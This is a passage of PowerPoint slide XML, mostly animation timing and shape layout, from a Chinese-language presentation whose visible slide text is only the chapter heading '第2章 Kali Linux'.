                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
